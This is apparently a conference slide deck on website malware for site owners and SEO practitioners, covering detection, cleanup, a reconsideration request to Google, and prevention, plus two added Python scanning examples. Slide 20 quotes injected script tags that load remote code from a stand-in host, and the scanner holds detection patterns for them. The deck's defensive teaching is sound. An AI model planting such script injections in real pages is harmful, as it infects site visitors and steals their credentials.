2. About Scott Hendison
• Began “hosting” websites in 1997 with one server in
our retail computer store, with standard DSL
• Grew to 11 servers then switched to a sort of
“datacenter co-op” a few years ago, all in the same
local facility in Gresham, Oregon.
• Not our primary business, but we still host over 1000
domains today, as well as maintain end-user hosting
accounts on several major hosts.
3. Web Hosting and SEO
• I've been on this panel three times and discussed –
– Shared vs. dedicated servers
– Static vs. shared IP addresses
– Apache 1 vs. Apache 2
– Apache vs. Windows
– .htaccess
– mod_rewrite
– Windows IIS rewriting options
– Server speed and performance
– and other riveting subjects trying to better relate to SEO
4. Web Hosting and SEO
Speed and Performance
• I “predicted” at Pubcon 2009 that speed would soon matter
for organic, then Matt Cutts announced it the next day
• Not a risky prediction, considering Adwords Quality Scores
• Speed as ranking factor began “counting” April 9, 2010
• Google has two great tools
– Page Speed for Firefox – (download inside Webmaster Tools)
– Google Chrome (right click in Chrome and “inspect element”)
5. But I’m Not Talking About Speed
• Far more important
• The #1 killer of websites
• The thing that drives visitors away in droves
• Drains PPC money as fast as possible
• Google stops people from even arriving at your site!
• I’m talking about…
7. Malware
• Nothing can fully protect users from getting viruses
• Viruses can steal the BEST passwords & logins
• If you don’t get one, contractors, employees or family
probably will, infecting your network.
• People should use index cards and a fireproof safe
• But that’s pretty unrealistic, so learn to deal with disasters
8. Malware identification
• Nearly 15% of “our” sites were hacked in 2010
• Most were self inflicted through laziness and stupidity
• The hacks really didn’t vary all that much
• Getting rid of hacks can be a headache
• Getting back into Google isn’t very difficult
• Protecting yourself FROM hacks is getting easier, but…
• Sadly, the hacking keeps getting easier…
10. Identification
• You can get notified by a client or customer
• You discover it in a browser or AV warning
• You can see your site flagged in the SERPS
• You can get notified by Google WMT – (sometimes)
14. #1 Conversion Killer
• Nothing hurts you more than if people won’t
come to your site in the first place.
• Once you’ve identified a problem, what can
you do?
– Clean up the offending code
– Beg Google for a clean bill of health
15. Removal
• Most hacks we saw were pretty similar
• Cross Site Scripting (XSS) and SQL Injection
• Adding links and adding hosted scripts
• Hackers want to add links to your site
• Hackers want to add scripts to infect users with
viruses which in turn, steal more passwords
• Not too technical - Look for strange javascripts!
18. Removal
• If WMT is no help, then look at files manually
• Use backups and file comparison tools
• Check recent change dates
• Look for things that don’t belong, often in
pages named index, home, and default - in
.php and .html extensions
• Look in headers and footers too
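The backup comparison and change-date check from this slide, as an added example (not from the original deck). It assumes you have a known-good backup unpacked next to the live copy; the function names, the extension list and the 7-day window are illustrative choices, and the sample trees are constructed.

```python
import hashlib
import os
import tempfile
import time

WEB_EXTS = (".php", ".html", ".htm", ".js")  # assumption: file types to check

def file_hashes(root):
    """Map each web file under root (relative path) to its SHA-256 digest."""
    out = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name.lower().endswith(WEB_EXTS):
                full = os.path.join(dirpath, name)
                with open(full, "rb") as fh:
                    out[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return out

def compare_to_backup(live_root, backup_root, recent_days=7):
    """Diff the live site against a known-good backup and list recent changes."""
    live, backup = file_hashes(live_root), file_hashes(backup_root)
    cutoff = time.time() - recent_days * 86400
    return {
        "added": sorted(live.keys() - backup.keys()),
        "removed": sorted(backup.keys() - live.keys()),
        "modified": sorted(p for p in live.keys() & backup.keys() if live[p] != backup[p]),
        "recent": sorted(p for p in live
                         if os.path.getmtime(os.path.join(live_root, p)) >= cutoff),
    }

def demo():
    """Compare a constructed live tree against a constructed backup."""
    with tempfile.TemporaryDirectory() as tmp:
        live, backup = os.path.join(tmp, "live"), os.path.join(tmp, "backup")
        for root in (live, backup):
            os.makedirs(root)
            for name in ("index.php", "footer.php"):
                with open(os.path.join(root, name), "w") as fh:
                    fh.write("<?php echo 'hello'; ?>\n")
        with open(os.path.join(live, "footer.php"), "a") as fh:  # injected line
            fh.write("<script src=http://domainX.ac.jp/course/VIVID.php></script>\n")
        with open(os.path.join(live, "default.html"), "w") as fh:  # file not in backup
            fh.write("<html></html>\n")
        old = time.time() - 90 * 86400  # age index.php so it is not "recent"
        os.utime(os.path.join(live, "index.php"), (old, old))
        return compare_to_backup(live, backup)

if __name__ == "__main__":
    print(demo())
```

Files listed under "added" or "modified" are the ones to open by hand; modification times can be reset by whoever changed the file, so treat "recent" as a hint and the hash comparison as the evidence.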
20. Removal
• Usually index, home, header and footer –
<script src=http://domainX.ac.jp/course/VIVID.php></script>
• And in most or all JavaScript files –
document.write('<script src=http://domainX.ac.jp/course/VIVID.php></script>');
21. Removal
• Not all that complicated, just tedious.
• Search files for <script src=http:// and make
sure you recognize them all, and search for
eval(base64 too.
• Overly simplistic to say “clean it up” but others
have likely had your same problem.
• Google for it w/ quotes to find YOUR exact code.
• Get a quick look at your site w/ free tool at
http://UnmaskParasites.com
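The two searches from this slide as an added example (not from the original deck): it lists every externally hosted script whose host is not on your own allowlist, and every eval(base64 occurrence, with line numbers. The sample file contents are constructed, and cdn.example.com is a hypothetical stand-in for a host you recognize.

```python
import re
from urllib.parse import urlparse

# <script ... src=URL>, quoted or not, even when the tag wraps across lines.
SCRIPT_SRC = re.compile(r"<script\b[^>]*?\bsrc\s*=\s*[\"']?(https?://[^\s\"'>]+)", re.I)
# eval(base64_decode(...)) style obfuscation, tolerating extra whitespace.
EVAL_B64 = re.compile(r"eval\s*\(\s*base64", re.I)

# Constructed sample files (not real site content).
SAMPLES = {
    "footer.php": '<div id="footer"></div>\n'
                  '<script src="https://cdn.example.com/js/site.js"></script>\n'
                  '<script\nsrc=http://domainX.ac.jp/course/VIVID.php\n></script>\n',
    "menu.js": "function menu() {}\n"
               "document.write('<script src=http://domainX.ac.jp/course/VIVID.php></script>');\n",
    "cache.php": "<?php\neval(base64_decode('Y29uc3RydWN0ZWQ='));\n?>\n",
    "about.html": "<html><script>var x = 1;</script></html>\n",
}

def line_of(text, offset):
    """1-based line number of a character offset."""
    return text.count("\n", 0, offset) + 1

def scan_text(text, allowed_hosts):
    """Return sorted (line, kind, detail) findings for one file's contents."""
    findings = []
    for m in SCRIPT_SRC.finditer(text):
        host = (urlparse(m.group(1)).hostname or "").lower()
        if host not in allowed_hosts:  # a script host you do not recognize
            findings.append((line_of(text, m.start()), "unrecognized-script", m.group(1)))
    for m in EVAL_B64.finditer(text):
        findings.append((line_of(text, m.start()), "eval-base64", m.group(0)))
    return sorted(findings)

def scan_samples(allowed_hosts=frozenset({"cdn.example.com"})):
    """Scan the constructed samples; allowed_hosts is the list you recognize."""
    return {name: scan_text(body, allowed_hosts) for name, body in SAMPLES.items()}

if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print(name, hits)
```

The document.write form in JavaScript files is caught by the same script-tag pattern, so one pass covers .php, .html and .js files alike.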
23. Once You’re Clean
Write something like this –
Thank you for identifying our malware
problem, and we believe all is now cleaned
up. We have verified that we're clean using
an online scanner -
http://www.unmaskparasites.com - and
would appreciate a speedy resolution.
Thank you,
Scott Hendison
24. Once You’re Clean
• Document your process and improve it
• Get ready to have it happen again
• Begin to protect yourself – Get paranoid.
25. Prevention
• FTP Passwords
– Don't share FTP access – make new users instead.
– NEVER use a dictionary word in the password
– Use at least 8 characters (some people will say 20+)
– Mix Upper Case, Lower Case, numerals and symbols
– CHANGE passwords without telling your dev people
every few months.
• Stop using plain old FTP - WinSCP is a free SFTP client
26. Prevention
• Using a CMS?
• Find the documentation on locking it down
• Do ALL system updates
• Do ALL released security patches
• Routine maintenance (just like WMT & Analytics)
• More popular = more vulnerable, like WordPress
27. Prevention
• Nearly 8% of all sites are now WordPress*
• We work in WordPress 95% of the time
• Same thing that makes it great makes it riskier
• Amazing plugins have been developed for safety
• Common threats have easy solutions
* Supposedly said by Matt Mullenweg at one of the 2010 WordCamps, but I can’t prove it.
32. Prevention
• Total prevention may be impossible. Be prepared!
• Backup restoration is sometimes faster than repair
• Hosts may keep backups 7 days, or even less!
• Get weekly (or daily) backups in place & off-host
• Store a year of monthly backups at AWS
• Document the entire restore process and TEST
• Your site hack is generally not the web host’s fault!
33. Take-aways
• FAR more important than your SEO
• Dig into Webmaster Tools malware area
• Change all FTP Passwords asap, & consider SFTP
• Check for updated versions on forms, and on
your CMS
• Get backup and restore processes in place NOW
34. Thank You
WordPress Lunch Table Thursday 1:30
Scott Hendison
Search Commander, Inc.
shendison@seoautomatic.com